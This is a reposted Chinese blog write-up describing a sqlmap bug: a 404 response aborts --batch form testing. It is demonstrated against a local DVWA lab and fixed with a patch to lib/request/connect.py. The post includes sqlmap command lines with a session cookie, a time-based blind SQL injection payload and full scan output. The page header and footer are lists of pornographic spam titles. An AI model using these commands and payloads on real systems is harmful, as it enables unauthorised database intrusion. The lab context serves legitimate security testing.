日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

selenium 状态码521_sqlmap对状态码404处理的bug

發(fā)布時間:2024/6/1 编程问答 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 selenium 状态码521_sqlmap对状态码404处理的bug 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

About

sqlmap對頁面遇到404響應碼后直接拋出一個異常并退出sqlmap不再進行后續(xù)的paylaod測試,在用sqlmap測試sql注入點的時候,一

般用到--batch參數(shù)來節(jié)省時間,這種情況下sqlmap有一處對http狀態(tài)碼404的處理不當導致無法測出注入點的bug

Detail

在爬蟲時get請求的url可輕易爬到,但是post請求的url及post的數(shù)據(jù)的取得需要探測html中有沒有表單相關的關鍵字,并通過表單

來構造post參數(shù)的值并提交來獲取后續(xù)返回內(nèi)容,如下例中詳情:

安裝dvwa設置level=low,測試SQL Injection(Blind)這一項時,參數(shù)是通過表單來提交的,點擊submit提交后會將輸入框User

ID中的內(nèi)容以get請求發(fā)送到服務器,例如在文本框中輸入1則瀏覽器將對應訪問http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#

嘗試用sqlmap跑出這個注入點,語句如下:

sqlmap -u "http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie='PHPSESSID=glgav33fgc0l1hoikg5f267j51;security=low'

這樣是可以跑出來的,但是要提高效率用工具自動發(fā)現(xiàn)這個漏洞時,一般這樣用sqlmap:

sqlmap -u "http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/" --forms --batch -v 3 --cookie='...'

由于這里的id參數(shù)的值通過爬蟲無法獲得,因為這個id參數(shù)的值是通過表單提交的,爬蟲最多可得到的url為:

http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#

上圖中的Submit按鈕對應的應該是js處理的動作,js將表單通過get請求發(fā)送到服務器,這種情況下,需要用selenium+phantomjs

來獲得上面的url(或者使用sqlmap中的--forms參數(shù)來捕獲這樣的表單),而就算得到了url,由于這個url中的id=,也即id值為空,

這種情況下,sqlmap的--batch參數(shù)的處理是隨機賦值給id并測試各種payload(eg,id=1389),然而dvwa中的這個頁面在服務器上的

處理并不一般,如果用戶提交的id參數(shù)在服務器上沒有查詢到,服務器會響應404狀態(tài)碼(可能一般waf也會這樣做),而sqlmap遇到

404狀態(tài)碼,直接就拋出異常并退出了,這樣導致無法用sqlmap的--batch參數(shù)測出這個sql注入點

其實如果用selenium+phantomjs得到了urlhttp://192.168.8.190/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#后

如果服務器正常響應查詢(這里的dvwa不正常響應,對查不到的統(tǒng)一返回404狀態(tài)碼),用sqlmap是可以檢測到這種不帶具體值的參數(shù)

類型url的注入點的,但是要設置--risk=3,默認的sqlmap的risk值為1,為1時sqlmap不會測試' or [sqli] and '1'='1(要測出

不帶參數(shù)值的參數(shù)的注入點則要通過or來測試),也即要發(fā)揮sqlmap的功能最好設置--batch --risk=3 --forms.試試直接用這種

方法測試上面的注入點(在dvwa中對應的頁面為http://192.168.8.190/dvwa/vulnerabilities/sqli_blind/):

/tmp/sqlmap [master] ? python2 sqlmap.py -u "192.168.8.190/dvwa/vulnerabilities/sqli_blind/" --forms -v 3 --cookie='PHPSESSID=glgav33fgc0l1hoikg5f267j51;security=low' --risk 3 --batch

___

__H__

___ ___[']_____ ___ ___ {1.1.8.6#dev}

|_ -| . [(] | .'| . |

|___|_ ["]_|_|_|__,| _|

|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:40:30

[14:40:30] [DEBUG] cleaning up configuration parameters

[14:40:30] [DEBUG] setting the HTTP timeout

[14:40:30] [DEBUG] setting the HTTP Cookie header

[14:40:30] [DEBUG] creating HTTP requests opener object

[14:40:30] [DEBUG] resolving hostname '192.168.8.190'

[14:40:30] [INFO] testing connection to the target URL

[14:40:30] [DEBUG] declared web page charset 'utf-8'

[14:40:30] [INFO] searching for forms

[14:40:30] [DEBUG] initializing the knowledge base

[#1] form:

GET http://192.168.8.190:80/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit

Cookie: PHPSESSID=glgav33fgc0l1hoikg5f267j51;security=low

do you want to test this form? [Y/n/q]

> Y

[14:40:30] [DEBUG] used the default behaviour, running in batch mode

Edit GET data [default: id=&Submit=Submit]: id=&Submit=Submit

[14:40:30] [DEBUG] used the default behaviour, running in batch mode

do you want to fill blank fields with random values? [Y/n] Y

[14:40:30] [DEBUG] used the default behaviour, running in batch mode

[14:40:30] [INFO] resuming back-end DBMS 'mysql'

[14:40:30] [INFO] using '/var/root/.sqlmap/output/results-08202017_0240pm.csv' as the CSV results file in multiple targets mode

[14:40:30] [DEBUG] resolving hostname '192.168.8.190'

[14:40:30] [DEBUG] declared web page charset 'utf-8'

[14:40:30] [CRITICAL] page not found (404)

[14:40:30] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 1 times

[14:40:30] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/var/root/.sqlmap/output/results-08202017_0240pm.csv'

[*] shutting down at 14:40:30

發(fā)現(xiàn)sqlmap跑不出來,嘗試修改sqlmap代碼,結果中有關鍵字page not found (404),于是定位相關代碼:

cd /tmp/sqlmap && grep -r "page not found" .

結果如下:

./lib/request/connect.py: errMsg = "page not found (%d)" % code

./lib/request/connect.py: debugMsg = "page not found (%d)" % code

./lib/utils/crawler.py: if "page not found" in getSafeExString(ex):

于是修改./lib/request/connect.py中代碼:

elif ex.code == httplib.NOT_FOUND:

if raise404:

errMsg = "page not found (%d)" % code

raise SqlmapConnectionException(errMsg)

else:

debugMsg = "page not found (%d)" % code

singleTimeLogMessage(debugMsg, logging.DEBUG)

將其中的raise SqlmapConnectionException(errMsg)注釋掉后再重新用剛才的sqlmap語句測試可測出這個注入點,詳情如下:

/tmp/sqlmap [master●] ? python2 sqlmap.py -u "192.168.8.190/dvwa/vulnerabilities/sqli_blind/" --forms -v 3 --cookie='PHPSESSID=glgav33fgc0l1hoikg5f267j51;security=low' --risk 3 --batch

[14:48:41] [DEBUG] checking for filtered characters

[14:48:41] [PAYLOAD] OOFt' OR 6597=IF((3988>3987),SLEEP(5),6597) AND 'sIjt'='sIjt

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

[14:49:06] [DEBUG] used the default behaviour, running in batch mode

sqlmap identified the following injection point(s) with a total of 146 HTTP(s) requests:

---

Parameter: id (GET)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 OR time-based blind

Payload: id=OOFt' OR SLEEP(5) AND 'CaKs'='CaKs&Submit=Submit

Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

---

do you want to exploit this SQL injection? [Y/n] Y

[14:49:06] [DEBUG] used the default behaviour, running in batch mode

[14:49:06] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Debian

web application technology: Apache 2.4.25

back-end DBMS: MySQL >= 5.0.12

[14:49:06] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 131 times

[14:49:06] [INFO] you can find results of scanning in multiple targets mode inside the CSV file

'/var/root/.sqlmap/output/results-08202017_0246pm.csv'

[*] shutting down at 14:49:06

已提交pull request到sqlmap,相關代碼文件為lib/request/connect.py,follow

總結

以上是生活随笔為你收集整理的selenium 状态码521_sqlmap对状态码404处理的bug的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 好吊视频一区二区三区四区 | 办公室大战高跟丝袜秘书经理ol | 国产精品69久久久久孕妇欧美 | 日韩欧美毛片 | av在线天堂网| 欧美三级久久久 | 播五月婷婷 | 青草视频在线免费观看 | 欧美日韩一二区 | 日本中文字幕一区二区 | 林由奈在线观看 | 91口爆一区二区三区在线 | 国产精品污www一区二区三区 | 奇米影视在线播放 | 久久精品99久久 | 在线a毛片 | 亚洲女人天堂色在线7777 | 免费看av软件 | 黄网视频在线观看 | 91精品国产综合久久久蜜臀 | 欧美巨乳在线观看 | 美女露出让男生揉的视频 | 精品少妇一区二区三区免费观看 | 97精品视频在线 | 激情午夜网 | 在线看国产 | 少妇4p| youjizz自拍| 91精品国产综合久久福利 | 97中文字幕在线观看 | 91正在播放 | 免费色播 | 亚洲欧美久久 | 影音先锋久久 | 成人小视频在线 | 日韩视频专区 | 操操操网| 欧美一区二区三区免费观看 | 免费看91| 男女视频网站 | 最色成人网 | 国产精品美女主播 | 黑人3p波多野结衣在线观看 | 色性av| 打开免费观看视频在线播放 | 五级 黄 色 片 | 中文字幕在线观看第二页 | 久久久国产一区二区 | 手机在线看片国产 | 亚洲一区h | 中文字幕av无码一区二区三区 | 国产精品久久久久久妇女 | 在线视频 中文字幕 | www日本xxx| 国内露脸中年夫妇交换 | 91人人视频 | 综合色小说| 久久理论电影 | 射美女 | 亚洲毛片在线看 | 亚洲不卡网 | 91精品国产成人观看 | 婷婷综合六月 | 久久久免费观看视频 | 久久久久久欧美 | 久久久午夜精品福利内容 | 欧美日韩亚洲免费 | 在线免费观看视频a | 男人天堂网站 | 国产精品对白刺激久久久 | 91精品国产色综合久久不卡98口 | 成年人福利| 国产精品久久久久久久久久久久久 | 中文久久乱码一区二区 | 亚洲av无码国产精品永久一区 | 久久久青青草 | 国产伦精品一区二区三区视频痴汉 | 欧美在线一级 | 日韩一区二区三区免费 | 日本不卡二区 | 美国少妇性做爰 | 成人片片 | 日韩激情视频网站 | 狠狠人妻久久久久久综合麻豆 | 国产av精国产传媒 | 亚洲色图综合网 | 性欧美ⅹxxxx极品护士 | 黄色片视频 | 爱情岛论坛亚洲品质自拍 | 加勒比在线一区 | 欧美日韩国产精品一区二区三区 | 久久精品国产成人av | 日韩三级视频在线播放 | 喷水少妇| 国产一区二区三区四区hd | 国产免费一区二区三区免费视频 | 国产绿帽一区二区三区 | 男女啪动最猛动态图 | 国产爆乳无码一区二区麻豆 |